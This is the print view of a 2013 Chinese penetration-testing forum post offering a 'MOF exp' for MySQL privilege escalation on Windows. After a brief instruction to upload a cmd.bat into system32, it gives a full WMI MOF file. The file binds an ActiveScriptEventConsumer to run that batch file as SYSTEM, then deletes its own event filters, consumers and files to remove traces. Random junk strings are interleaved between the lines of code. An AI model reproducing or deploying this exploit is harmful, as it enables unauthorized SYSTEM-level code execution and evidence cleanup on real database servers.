中国网络渗透测试联盟
标题:
Mysql 提权即时无错Mof exp
[打印本页]
作者:
admin
时间:
2013-2-14 00:05
标题:
Mysql 提权即时无错Mof exp
这个sql提权MOF需要运行 system下的文件,不能定义路径。
2 V% e+ u9 h9 ?) A: b$ t% ~
需要将要运行的命令写入到bat上传到system32目录,然后执行。
& d) E K v, S1 d8 u" t! f( J, |5 x
9 c6 p6 a" }# J! U9 E' B, e8 }
这个sql提权MOF需要运行 system下的文件,不能定义路径。
3 z" V& E( D: C) S) u5 Y
需要将要运行的命令写入到bat上传到system32目录,然后执行。
/ I( t! k6 O# |( i# d
! \! ^4 h# y" M- }+ R- G5 Z% M1 v
#pragma
. Y+ }& W9 @; u
namespace("\\\\.\\root\\cimv2")
; T& T3 Q, H9 n' F8 u0 l: f" k; K0 m4 e
class
3 V5 b, ~. S; u
MyClass547
+ e7 e/ } D/ Z. B( c
{ [key]
2 }1 ~2 r" J& {/ q6 s2 v
string
; A. m" a# d* Z" F: D
Name;
. Q& M O2 S! M, u& p: V! R
};
* t# z: D8 J7 M" }! Q* T
class
- V9 T4 }# G8 D9 _6 }
ActiveScriptEventConsumer
* A; ^5 A. ?7 ?: \' p5 u
: __EventConsumer { [key]
$ d }' e. S7 P8 ~( E6 S
string
& l! s0 J" `" @' w/ j
Name; [not_null]
) H$ X) R; D" Z n3 _' q, N
string
" y+ `! e7 e0 x4 W' }' h: x
ScriptingEngine; string
: a; Q5 V4 U; a3 q, F. t! h2 g
ScriptFileName; [template]
+ K: C9 N* J: A3 A) }) O$ J
string
' F; _8 }6 j- x
ScriptText; uint32 KillTimeout;
, }6 e* g) E- T$ C$ [- j& B( L
}; instance of __Win32Provider as $P {
' O- D: K* O5 C d4 c, [* I
Name
8 b8 F$ E+ o. a4 @; `4 p
=
2 ~, `' X& u3 i# a6 J
"ActiveScriptEventConsumer"; CLSID =
7 \4 \! H6 W3 F& |1 X3 R8 B( g/ [
"{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
* Y% r+ x8 n( v) @
PerUserInitialization
8 R6 V( ?1 N8 K+ a
= TRUE;
6 K( C# B6 ?) r- c$ }4 x) {2 {
}; instance of __EventConsumerProviderRegistration { Provider
0 y% D8 f5 ~3 z
= $P; ConsumerClassNames
' P# D' m7 S# E7 ]
=
$ C# N5 D+ q# j0 G
{"ActiveScriptEventConsumer"};
t. ?# j# k; P: \. n7 Z
};
, d8 C9 d- u) s% ^; S* V3 ?5 q$ R
Instance of ActiveScriptEventConsumer
3 q+ W% R3 E, Q: a; s( h; C, D
as $cons { Name
0 d; d- r8 u7 ~1 f
=
: `* _* _, Q) A$ Y f
"ASEC"; ScriptingEngine
' T3 ~5 [; L. j! x9 [3 F
=
$ P- e" Y( A1 l# k; L) n
"JScript"; ScriptText
+ S4 H7 \. S+ X3 F& P' @ x2 Y
=
* J0 H; |# `: i
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };
2 c* u7 @+ S% d: q
Instance of ActiveScriptEventConsumer
, ^3 z6 ]4 t% n; _' T1 J/ n
as $cons2 { Name
2 z. O; S, z" J8 T r" @. o; K
=
. s% {* ?, ~0 X9 K3 ^9 K
"qndASEC"; ScriptingEngine
, S6 V( s/ E8 ]/ ]6 H; m
=
; s5 m. g4 s2 V1 l5 k1 q! X
"JScript"; ScriptText
% S2 O. q# Y8 ~! C+ J! `
=
# X6 I; l& N& m. D( p$ D
"\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
; c( V% J$ y+ }( c
}; instance of __EventFilter as $Filt { Name
1 U& [# i% l+ R) [4 C
=
3 M; H, j! a3 R; W3 F
"instfilt"; Query
+ S v: Z( f( n) @* e* @3 o) C. {
=
: }. \. i8 L; G8 M
"SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage
0 B; Q/ N0 J8 ?+ Q
=
5 X" Z% ^ Q" H$ }/ C
"WQL"; }; instance of __EventFilter as $Filt2 { Name
' z8 g' k7 Q! L$ h, g/ ?
=
$ f( f# _3 }+ b+ ]' w. z. p, X* ~
"qndfilt"; Query
, Q0 v- ]6 i2 l: u# u# G/ I4 {
=
( E+ w& b. L. h4 A
"SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage
4 M1 z! V0 A' _; M
=
" m, B! p- i& b5 ]9 O6 w
"WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer
. ^ X8 K/ h5 N. @( ^% E
= $cons; Filter
5 g) s$ d" X- {/ s3 |( i+ z' T
= $Filt;
9 `" k) O j" q' J2 Z3 Z! y, i
}; instance of __FilterToConsumerBinding as $bind2 { Consumer
* P) j" |, g. x7 }
= $cons2; Filter
8 M9 ^5 a+ A- `' T; c# O+ h
= $Filt2;
3 c3 S M7 m6 C* J& z+ z- t) t
}; instance of MyClass547
+ K# R; A- |) U, J
as $MyClass { Name
& g1 g" R& T9 U! x
=
2 ^6 J( J: K5 l. O
"ClassConsumer";
2 P8 u* r0 t4 D! F! J
};
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2